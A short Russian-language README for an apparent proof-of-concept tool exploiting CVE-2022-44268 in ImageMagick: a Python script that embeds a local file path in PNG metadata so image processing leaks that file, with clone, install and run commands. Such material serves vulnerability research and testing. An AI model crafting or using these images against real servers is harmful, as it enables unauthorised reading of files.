
Python-скрипт, который генерирует PNG-изображение, эксплуатирующее CVE-2022-44268 для внедрения и утечки путей локальных файлов через разбор метаданных ImageMagick.
Этот скрипт на Python создаёт PNG-изображение, заполненное определённым цветом, и встраивает путь к файлу в качестве метаданных с помощью библиотеки Pillow.
pip install pillow)git clone https://github.com/NataliSemi/-CVE-2022-44268.git
cd -CVE-2022-44268.git
pip install pillow
pip install pypng
python create_image.py
Сгенерированное изображение: После запуска скрипта в каталоге репозитория будет создан файл изображения с именем image.png.
python create_image.py -f /path/to/local/file.txt -o output_image.png